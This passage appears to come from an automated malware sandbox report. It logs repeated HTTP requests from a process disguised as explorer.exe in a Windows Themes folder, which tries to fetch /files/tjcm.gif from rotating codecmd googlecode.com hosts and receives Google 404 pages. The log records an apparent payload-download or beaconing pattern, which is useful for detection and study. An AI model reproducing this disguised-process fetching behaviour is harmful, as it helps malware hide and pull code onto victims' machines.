                                                                                                                                                                                                                                      Dec 16, 2024 08:28:52.839701891 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      26192.168.2.649957173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:53.685179949 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.095558882 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:54 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.095619917 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      27192.168.2.649963173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:55.966562986 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:57.401066065 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:57 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:57.401164055 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      28192.168.2.649969173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:58.270940065 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.667606115 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:59.667768955 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      29192.168.2.649975173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:00.375811100 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:01.779937983 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:29:01 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:01.779958010 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      30192.168.2.649981173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:02.623119116 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.024187088 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:29:03 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.024240971 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      31192.168.2.649988173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:04.937452078 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:06.366533995 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:29:06 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:06.366616964 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      32192.168.2.649994173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:07.073662996 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:29:08.465770006 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:29:08 GMT
